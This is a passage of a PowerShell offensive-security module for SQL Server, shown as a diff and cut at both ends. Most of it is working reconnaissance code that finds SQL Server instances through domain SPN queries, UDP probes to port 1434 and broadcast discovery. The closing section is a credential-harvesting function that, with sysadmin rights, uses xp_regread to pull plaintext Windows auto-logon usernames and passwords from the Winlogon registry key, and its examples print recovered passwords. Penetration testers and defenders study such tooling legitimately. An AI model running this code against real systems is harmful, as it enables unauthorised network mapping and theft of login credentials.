VERBOSE: 35 instances were found. + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com + DomainAccountSid : 1500000521000123456712921821222049996811922123456 + DomainAccount : SQLServer1$ + DomainAccountCn : SQLServer1 + Service : MSSQLSvc + Spn : MSSQLSvc/SQLServer1.domain.com + LastLogon : 6/22/2016 9:00 AM + [TRUNCATED] + + + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'Domain user to authenticate with domain\user.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain password to authenticate with domain\user.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] + [string]$DomainController, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Computer name to filter for.')] + [string]$ComputerName, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain account to filter for.')] + [string]$DomainAccount, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Performs UDP scan of servers managing SQL Server clusters.')] + [switch]$CheckMgmt, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Preforms a DNS lookup on the instance.')] + [switch]$IncludeIP, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate.')] + [int]$UDPTimeOut = 3 + ) + + Begin + { + # Table for SPN output + $TblSQLServerSpns = New-Object -TypeName System.Data.DataTable + $null = $TblSQLServerSpns.Columns.Add('ComputerName') + $null = $TblSQLServerSpns.Columns.Add('Instance') + $null = $TblSQLServerSpns.Columns.Add('DomainAccountSid') + $null = $TblSQLServerSpns.Columns.Add('DomainAccount') + $null = $TblSQLServerSpns.Columns.Add('DomainAccountCn') + $null = $TblSQLServerSpns.Columns.Add('Service') + $null = $TblSQLServerSpns.Columns.Add('Spn') + $null = $TblSQLServerSpns.Columns.Add('LastLogon') + $null = $TblSQLServerSpns.Columns.Add('Description') + + if($IncludeIP) + { + $null = $TblSQLServerSpns.Columns.Add('IPAddress') + } + # Table for UDP scan results of management servers + } + + Process + { + # Get list of SPNs for SQL Servers + Write-Verbose -Message 'Grabbing SPNs from the domain for SQL Servers (MSSQL*)...' + $TblSQLServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSSQL*' -SuppressVerbose | Where-Object -FilterScript { + $_.service -like 'MSSQL*' + } + + Write-Verbose -Message 'Parsing SQL Server instances from SPNs...' + + # Add column containing sql server instance + $TblSQLServers | + ForEach-Object -Process { + # Parse SQL Server instance + $Spn = $_.Spn + $Instance = $Spn.split('/')[1].split(':')[1] + + # Check if the instance is a number and use the relevent delim + $Value = 0 + if([int32]::TryParse($Instance,[ref]$Value)) + { + $SpnServerInstance = $Spn -replace ':', ',' + } + else + { + $SpnServerInstance = $Spn -replace ':', '\' + } + + $SpnServerInstance = $SpnServerInstance -replace 'MSSQLSvc/', '' + + $TableRow = @([string]$_.ComputerName, + [string]$SpnServerInstance, + $_.UserSid, + [string]$_.User, + [string]$_.Usercn, + [string]$_.Service, + [string]$_.Spn, + $_.LastLogon, + [string]$_.Description) + + if($IncludeIP) + { + try + { + $IPAddress = [Net.DNS]::GetHostAddresses([String]$_.ComputerName).IPAddressToString + if($IPAddress -is [Object[]]) + { + $IPAddress = $IPAddress -join ", " + } + } + catch + { + $IPAddress = "0.0.0.0" + } + $TableRow += $IPAddress + } + + # Add SQL Server spn to table + $null = $TblSQLServerSpns.Rows.Add($TableRow) + } + + # Enumerate SQL Server instances from management servers + if($CheckMgmt) + { + Write-Verbose -Message 'Grabbing SPNs from the domain for Servers managing SQL Server clusters (MSServerClusterMgmtAPI)...' + $TblMgmtServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSServerClusterMgmtAPI' -SuppressVerbose | + Where-Object -FilterScript { + $_.ComputerName -like '*.*' + } | + Select-Object -Property ComputerName -Unique | + Sort-Object -Property ComputerName + + Write-Verbose -Message 'Performing a UDP scan of management servers to obtain managed SQL Server instances...' + $TblMgmtSQLServers = $TblMgmtServers | + Select-Object -Property ComputerName -Unique | + Get-SQLInstanceScanUDP -UDPTimeOut $UDPTimeOut + } + } + + End + { + # Return data + if($CheckMgmt) + { + Write-Verbose -Message 'Parsing SQL Server instances from the UDP scan...' + $Tbl1 = $TblMgmtSQLServers | + Select-Object -Property ComputerName, Instance | + Sort-Object -Property ComputerName, Instance + $Tbl2 = $TblSQLServerSpns | + Select-Object -Property ComputerName, Instance | + Sort-Object -Property ComputerName, Instance + $Tbl3 = $Tbl1 + $Tbl2 + + $InstanceCount = $Tbl3.rows.count + Write-Verbose -Message "$InstanceCount instances were found." + $Tbl3 + } + else + { + $InstanceCount = $TblSQLServerSpns.rows.count + Write-Verbose -Message "$InstanceCount instances were found." + $TblSQLServerSpns + } + } +} + + +# ------------------------------------------- +# Function: Get-SQLInstanceLocal +# ------------------------------------------- +# Author: Scott Sutherland +Function Get-SQLInstanceLocal +{ + <# + .SYNOPSIS + Returns a list of the SQL Server instances found in the Windows registry for the local system. + .EXAMPLE + PS C:\> Get-SQLInstanceLocal + + ComputerName : Computer1 + Instance : Computer1\SQLEXPRESS + ServiceDisplayName : SQL Server (SQLEXPRESS) + ServiceName : MSSQL$SQLEXPRESS + ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS + ServiceAccount : NT Service\MSSQL$SQLEXPRESS + State : Running + + ComputerName : Computer1 + Instance : Computer1\STANDARDDEV2014 + ServiceDisplayName : SQL Server (STANDARDDEV2014) + ServiceName : MSSQL$STANDARDDEV2014 + ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\Binn\sqlservr.exe" -sSTANDARDDEV2014 + ServiceAccount : LocalSystem + State : Running + + ComputerName : Computer1 + Instance : Computer1 + ServiceDisplayName : SQL Server (MSSQLSERVER) + ServiceName : MSSQLSERVER + ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER + ServiceAccount : NT Service\MSSQLSERVER + State : Running + + #> + Begin + { + # Table for output + $TblLocalInstances = New-Object -TypeName System.Data.DataTable + $null = $TblLocalInstances.Columns.Add('ComputerName') + $null = $TblLocalInstances.Columns.Add('Instance') + $null = $TblLocalInstances.Columns.Add('ServiceDisplayName') + $null = $TblLocalInstances.Columns.Add('ServiceName') + $null = $TblLocalInstances.Columns.Add('ServicePath') + $null = $TblLocalInstances.Columns.Add('ServiceAccount') + $null = $TblLocalInstances.Columns.Add('State') + } + + Process + { + # Grab SQL Server services for the server + $SqlServices = Get-SQLServiceLocal | Where-Object -FilterScript { + $_.ServicePath -like '*sqlservr.exe*' + } + + # Add recrds to SQL Server instance table + $SqlServices | + ForEach-Object -Process { + # Parse Instance + $ComputerName = [string]$_.ComputerName + $DisplayName = [string]$_.ServiceDisplayName + + if($DisplayName) + { + $Instance = $ComputerName + '\' +$DisplayName.split('(')[1].split(')')[0] + if($Instance -like '*\MSSQLSERVER') + { + $Instance = $ComputerName + } + } + else + { + $Instance = $ComputerName + } + + # Add record + $null = $TblLocalInstances.Rows.Add( + [string]$_.ComputerName, + [string]$Instance, + [string]$_.ServiceDisplayName, + [string]$_.ServiceName, + [string]$_.ServicePath, + [string]$_.ServiceAccount, + [string]$_.ServiceState) + } + } + + End + { + + # Status User + $LocalInstanceCount = $TblLocalInstances.rows.count + Write-Verbose -Message "$LocalInstanceCount local instances where found." + + # Return data + $TblLocalInstances + } +} + + +# ---------------------------------- +# Get-SQLInstanceScanUDP +# ---------------------------------- +# Author: Eric Gruber +# Note: Pipeline and timeout mods by Scott Sutherland +function Get-SQLInstanceScanUDP +{ + <# + .SYNOPSIS + Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers. + .PARAMETER ComputerName + Computer name or IP address to enumerate SQL Instance from. + .PARAMETER UDPTimeOut + Timeout in seconds. Longer timeout = more accurate. + .EXAMPLE + PS C:\> Get-SQLInstanceScanUDP -Verbose -ComputerName SQLServer1.domain.com + VERBOSE: - SQLServer1.domain.com - UDP Scan Start. + VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Express + InstanceName : Express + ServerIP : 10.10.10.30 + TCPPort : 51663 + BaseVersion : 11.0.2100.60 + IsClustered : No + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Standard + InstanceName : Standard + ServerIP : 10.10.10.30 + TCPPort : 51861 + BaseVersion : 11.0.2100.60 + IsClustered : No + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose + VERBOSE: - SQLServer1.domain.com - UDP Scan Start. + VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. + + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Express + InstanceName : Express + ServerIP : 10.10.10.30 + TCPPort : 51663 + BaseVersion : 11.0.2100.60 + IsClustered : No + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Standard + InstanceName : Standard + ServerIP : 10.10.10.30 + TCPPort : 51861 + BaseVersion : 11.0.2100.60 + IsClustered : No + [TRUNCATED] + #> + [CmdletBinding()] + param( + + [Parameter(Mandatory = $true, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')] + [string]$ComputerName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')] + [int]$UDPTimeOut = 2, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup data table for results + $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table' + $null = $TableResults.columns.add('ComputerName') + $null = $TableResults.columns.add('Instance') + $null = $TableResults.columns.add('InstanceName') + $null = $TableResults.columns.add('ServerIP') + $null = $TableResults.columns.add('TCPPort') + $null = $TableResults.columns.add('BaseVersion') + $null = $TableResults.columns.add('IsClustered') + } + + Process + { + if(-not $SuppressVerbose) + { + Write-Verbose -Message " - $ComputerName - UDP Scan Start." + } + + # Verify server name isn't empty + if ($ComputerName -ne '') + { + # Try to enumerate SQL Server instances from remote system + try + { + # Resolve IP + $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName) + + # Create UDP client object + $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient + + # Attempt to connect to system + $UDPTimeOutMilsec = $UDPTimeOut * 1000 + $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec + $UDPClient.Connect($ComputerName,0x59a) + $UDPPacket = 0x03 + + # Send request to system + $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0) + $UDPClient.Client.Blocking = $true + [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length) + + # Process response from system + $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint) + $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';') + + $values = @{} + + for($i = 0; $i -le $Response.length; $i++) + { + if(![string]::IsNullOrEmpty($Response[$i])) + { + $values.Add(($Response[$i].ToLower() -replace '[\W]', ''),$Response[$i+1]) + } + else + { + if(![string]::IsNullOrEmpty($values.'tcp')) + { + if(-not $SuppressVerbose) + { + $DiscoveredInstance = "$ComputerName\"+$values.'instancename' + Write-Verbose -Message "$ComputerName - Found: $DiscoveredInstance" + } + + # Add SQL Server instance info to results table + $null = $TableResults.rows.Add( + [string]$ComputerName, + [string]"$ComputerName\"+$values.'instancename', + [string]$values.'instancename', + [string]$IPAddress, + [string]$values.'tcp', + [string]$values.'version', + [string]$values.'isclustered') + $values = @{} + } + } + } + + # Close connection + $UDPClient.Close() + } + catch + { + #"Error was $_" + #$line = $_.InvocationInfo.ScriptLineNumber + #"Error was in Line $line" + + # Close connection + # $UDPClient.Close() + } + } + if(-not $SuppressVerbose) + { + Write-Verbose -Message " - $ComputerName - UDP Scan Complete." + } + } + + End + { + # Return Results + $TableResults + } +} + + +# ------------------------------------------- +# Function: Get-SQLInstanceBroadcast +# ------------------------------------------- +# Author: Scott Sutherland +# Initial publication by @nikhil_mitt on twitter +function Get-SQLInstanceBroadcast +{ + <# + .SYNOPSIS + This function sends a UDP request to the broadcast address of the current subnet using the + SMB protocol over port 138 to identify SQL Server instances on the local network. The .net function used + has been supported since .net version 2.0. For more information see the reference below: + https://msdn.microsoft.com/en-us/library/system.data.sql.sqldatasourceenumerator(v=vs.110).aspx + .EXAMPLE + PS C:\> Get-SQLInstanceBroadcast -Verbose + VERBOSE: Attempting to identify SQL Server instances on the broadcast domain. + VERBOSE: 7 SQL Server instances were found. + + ComputerName Instance IsClustered Version + ------------ -------- ----------- ------- + MSSQLSRV01 MSSQLSRV01\SQLSERVER2012 No 11.0.2100.60 + MSSQL2K5 MSSQL2K5 No 9.00.1399.06 + MSSQLSRV03 MSSQLSRV03\SQLSERVER2008 No 10.0.1600.22 + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 No 12.0.4100.1 + MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 No 13.0.1601.5 + MSSQLSRV04 MSSQLSRV04\BOSCHSQL No 12.0.4100.1 + MSSQLSRV04 MSSQLSRV04\SQLSERVER2017 No 14.0.500.272 + #> + + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'This will send a UDP request to each of the identified SQL Server instances to gather more information..')] + [switch]$UDPPing + ) + + Begin + { + # Create data table for output + $TblSQLServers = New-Object -TypeName System.Data.DataTable + $null = $TblSQLServers.Columns.Add('ComputerName') + $null = $TblSQLServers.Columns.Add('Instance') + $null = $TblSQLServers.Columns.Add('IsClustered') + $null = $TblSQLServers.Columns.Add('Version') + + Write-Verbose "Attempting to identify SQL Server instances on the broadcast domain." + } + + Process + { + try { + + # Discover instances + $Instances = [System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources() + + # Add results to modified data table + $Instances | + ForEach-Object { + [string]$InstanceTemp = $_.InstanceName + if($InstanceTemp){ + [string]$InstanceName = $_.Servername + "\" + $_.InstanceName + }else{ + [string]$InstanceName = $_.Servername + } + [string]$ComputerName = $_.Servername + [string]$IsClustered = $_.IsClustered + [string]$Version = $_.Version + + # Add to table + $TblSQLServers.Rows.Add($ComputerName, $InstanceName, $IsClustered, $Version) | Out-Null + } + } + catch{ + + # Show error message + $ErrorMessage = $_.Exception.Message + Write-Host -Message " Operation Failed." + Write-Host -Message " Error: $ErrorMessage" + } + } + + End + { + # Get instance count + $InstanceCount = $TblSQLServers.Rows.Count + Write-Verbose "$InstanceCount SQL Server instances were found." + + # Get port and force engcryption flag + if($UDPPing){ + Write-Verbose "Performing UDP ping against $InstanceCount SQL Server instances." + $TblSQLServers | + ForEach-Object{ + $CurrentComputer = $_.ComuterName + Get-SQLInstanceScanUDP -ComputerName $_.ComputerName -SuppressVerbose + } + } + + # Return results + if(-not $UDPPing){ + $TblSQLServers + } + } +} + + +# ---------------------------------- +# Get-SQLInstanceScanUDPThreaded +# ---------------------------------- +# Author: Eric Gruber +# Note: Pipeline and timeout mods by Scott Sutherland +function Get-SQLInstanceScanUDPThreaded +{ + <# + .SYNOPSIS + Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers. + .PARAMETER ComputerName + Computer name or IP address to enumerate SQL Instance from. + .PARAMETER UDPTimeOut + Timeout in seconds. Longer timeout = more accurate. + .PARAMETER Threads + Number of concurrent host threads. + .EXAMPLE + PS C:\> Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1.domain.com + VERBOSE: - SQLServer1.domain.com - UDP Scan Start. + VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Express + InstanceName : Express + ServerIP : 10.10.10.30 + TCPPort : 51663 + BaseVersion : 11.0.2100.60 + IsClustered : No + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Standard + InstanceName : Standard + ServerIP : 10.10.10.30 + TCPPort : 51861 + BaseVersion : 11.0.2100.60 + IsClustered : No + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose -Threads 20 + VERBOSE: - SQLServer1.domain.com - UDP Scan Start. + VERBOSE: - SQLServer1.domain.com - UDP Scan Complete. + + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Express + InstanceName : Express + ServerIP : 10.10.10.30 + TCPPort : 51663 + BaseVersion : 11.0.2100.60 + IsClustered : No + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com\Standard + InstanceName : Standard + ServerIP : 10.10.10.30 + TCPPort : 51861 + BaseVersion : 11.0.2100.60 + IsClustered : No + [TRUNCATED] + #> + + [CmdletBinding()] + param( + + [Parameter(Mandatory = $true, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')] + [string]$ComputerName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')] + [int]$UDPTimeOut = 2, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads.')] + [int]$Threads = 5, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup data table for results + $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table' + $null = $TableResults.columns.add('ComputerName') + $null = $TableResults.columns.add('Instance') + $null = $TableResults.columns.add('InstanceName') + $null = $TableResults.columns.add('ServerIP') + $null = $TableResults.columns.add('TCPPort') + $null = $TableResults.columns.add('BaseVersion') + $null = $TableResults.columns.add('IsClustered') + $TableResults.Clear() + + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable + + # Ensure provide instance is processed + if($Instance) + { + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } + $PipelineItems = $PipelineItems + $ProvideInstance + } + } + + Process + { + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } + + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + $ComputerName = $_.ComputerName + + if(-not $SuppressVerbose) + { + Write-Verbose -Message " - $ComputerName - UDP Scan Start." + } + + + # Verify server name isn't empty + if ($ComputerName -ne '') + { + # Try to enumerate SQL Server instances from remote system + try + { + # Resolve IP + $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName) + + # Create UDP client object + $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient + + # Attempt to connect to system + $UDPTimeOutMilsec = $UDPTimeOut * 1000 + $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec + $UDPClient.Connect($ComputerName,0x59a) + $UDPPacket = 0x03 + + # Send request to system + $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0) + $UDPClient.Client.Blocking = $true + [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length) + + # Process response from system + $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint) + $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';') + + $values = @{} + + for($i = 0; $i -le $Response.length; $i++) + { + if(![string]::IsNullOrEmpty($Response[$i])) + { + $values.Add(($Response[$i].ToLower() -replace '[\W]', ''),$Response[$i+1]) + } + else + { + if(![string]::IsNullOrEmpty($values.'tcp')) + { + if(-not $SuppressVerbose) + { + $DiscoveredInstance = "$ComputerName\"+$values.'instancename' + Write-Verbose -Message " - $ComputerName - Found: $DiscoveredInstance" + } + + # Add SQL Server instance info to results table + $null = $TableResults.rows.Add( + [string]$ComputerName, + [string]"$ComputerName\"+$values.'instancename', + [string]$values.'instancename', + [string]$IPAddress, + [string]$values.'tcp', + [string]$values.'version', + [string]$values.'isclustered') + $values = @{} + } + } + } + + # Close connection + $UDPClient.Close() + } + catch + { + #"Error was $_" + #$line = $_.InvocationInfo.ScriptLineNumber + #"Error was in Line $line" + + # Close connection + # $UDPClient.Close() + } + } + + if(-not $SuppressVerbose) + { + Write-Verbose -Message " - $ComputerName - UDP Scan End." + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TableResults + } +} + +# ---------------------------------- +# Get-SQLInstanceFile +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLInstanceFile +{ + <# + .SYNOPSIS + Returns a list of SQL Server instances from a file. + One per line. Three instance formats supported: + 1 - computername + 2 - computername\instance + 3 - computername,1433 + .PARAMETER FilePath + Path to file containing instances. One per line. + .EXAMPLE + PS C:\> Get-SQLInstanceFile -Verbose -FilePath c:\temp\servers.txt + VERBOSE: Importing instances from file path. + VERBOSE: 3 instances where found in c:\temp\servers.txt. + + ComputerName Instance + ------------ -------- + Computer1 Computer1\SQLEXPRESS + Computer1 Computer1\STANDARDDEV2014 + Computer1 Computer1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $true, + HelpMessage = 'The file path.')] + [string]$FilePath + ) + + Begin + { + # Table for output + $TblFileInstances = New-Object -TypeName System.Data.DataTable + $null = $TblFileInstances.Columns.Add('ComputerName') + $null = $TblFileInstances.Columns.Add('Instance') + } + + Process + { + # Test file path + if(Test-Path $FilePath) + { + Write-Verbose -Message 'Importing instances from file path.' + } + else + { + Write-Host -InputObject 'File path does not appear to be valid.' + break + } + + # Grab lines from file + Get-Content -Path $FilePath | + ForEach-Object -Process { + $Instance = $_ + if($Instance.Split(',')[1]) + { + $ComputerName = $Instance.Split(',')[0] + } + else + { + $ComputerName = $Instance.Split('\')[0] + } + + # Add record + if($_ -ne '') + { + $null = $TblFileInstances.Rows.Add($ComputerName,$Instance) + } + } + } + + End + { + + # Status User + $FileInstanceCount = $TblFileInstances.rows.count + Write-Verbose -Message "$FileInstanceCount instances where found in $FilePath." + + # Return data + $TblFileInstances + } +} +#endregion + +######################################################################### +# +#region PASSWORD RECOVERY FUNCTIONS +# +######################################################################### + +# ---------------------------------- +# Get-SQLRecoverPwAutoLogon +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLRecoverPwAutoLogon +{ + <# + .SYNOPSIS + Returns the Windows auto login credentials through SQL Server using xp_regread. + This requires sysadmin privileges. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .Example + PS C:\> Get-SQLInstanceLocal | Get-SQLRecoverPwAutoLogon -Verbose + VERBOSE: SQLServer1\SQLEXPRESS : Connection Success. + VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. + VERBOSE: SQLServer1 : Connection Success. + + + ComputerName : SQLServer1 + Instance : SQLServer1\SQLEXPRESS + Domain : Demo + UserName : KioskAdmin + Password : KioskPassword! + + ComputerName : SQLServer1 + Instance : SQLServer1\SQLEXPRESS + Domain : Demo + UserName : kioskuser + Password : KioskUserPassword! + + .Example + PS C:\> Get-SQLRecoverPwAutoLogon -Verbose -instance SQLServer1\STANDARDDEV2014 + VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. + + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Domain : localhost + UserName : KioskAdmin + Password : KioskPassword! + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Domain : localhost2 + UserName : kioskuser + Password : KioskUserPassword! + + .Notes + https://support.microsoft.com/en-us/kb/321185 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblWinAutoCreds = New-Object -TypeName System.Data.DataTable + $TblWinAutoCreds.Columns.Add("ComputerName") | Out-Null + $TblWinAutoCreds.Columns.Add("Instance") | Out-Null + $TblWinAutoCreds.Columns.Add("Domain") | Out-Null + $TblWinAutoCreds.Columns.Add("UserName") | Out-Null + $TblWinAutoCreds.Columns.Add("Password") | Out-Null + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + # Get SQL Server version number + $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber + if($SQLVersionFull) + { + $SQLVersionShort = $SQLVersionFull.Split('.')[0] + } + + # Check if this can actually run with the current login + if($IsSysadmin -ne "Yes") + { + Write-Verbose "$Instance : This function requires sysadmin privileges. Done." + Return + } + + # Get default auto login Query + $DefaultQuery = " + ------------------------------------------------------------------------- + -- Get Windows Auto Login Credentials from the Registry + ------------------------------------------------------------------------- + + -- Get AutoLogin Default Domain + DECLARE @AutoLoginDomain SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', + @value_name = N'DefaultDomainName', + @value = @AutoLoginDomain output + + -- Get AutoLogin DefaultUsername + DECLARE @AutoLoginUser SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', + @value_name = N'DefaultUserName', + @value = @AutoLoginUser output + + -- Get AutoLogin DefaultUsername + DECLARE @AutoLoginPassword SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', + @value_name = N'DefaultPassword', + @value = @AutoLoginPassword output + + -- Display Results + SELECT Domain = @AutoLoginDomain, Username = @AutoLoginUser, Password = @AutoLoginPassword" + + # Execute Default Query + $DefaultResults = Get-SQLQuery -Instance $Instance -Query $DefaultQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $DefaultUsername = $DefaultResults.Username + if($DefaultUsername.length -ge 2){ + + # Add record to data table + $DefaultResults | ForEach-Object{ + $TblWinAutoCreds.Rows.Add($ComputerName, $Instance,$_.Domain,$_.Username,$_.Password) | Out-Null + } + }else{ + Write-Verbose "$Instance : No default auto login credentials found." + } + + # Get default alt auto login Query + $AltQuery = " + ------------------------------------------------------------------------- + -- Get Alternative Windows Auto Login Credentials from the Registry + ------------------------------------------------------------------------- + + -- Get Alt AutoLogin Default Domain + DECLARE @AltAutoLoginDomain SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', + @value_name = N'AltDefaultDomainName', + @value = @AltAutoLoginDomain output + + -- Get Alt AutoLogin DefaultUsername + DECLARE @AltAutoLoginUser SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', + @value_name = N'AltDefaultUserName', + @value = @AltAutoLoginUser output + + -- Get Alt AutoLogin DefaultUsername + DECLARE @AltAutoLoginPassword SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', + @value_name = N'AltDefaultPassword', + @value = @AltAutoLoginPassword output + + -- Display Results + SELECT Domain = @AltAutoLoginDomain, Username = @AltAutoLoginUser, Password = @AltAutoLoginPassword" + + # Execute Default Query + $AltResults = Get-SQLQuery 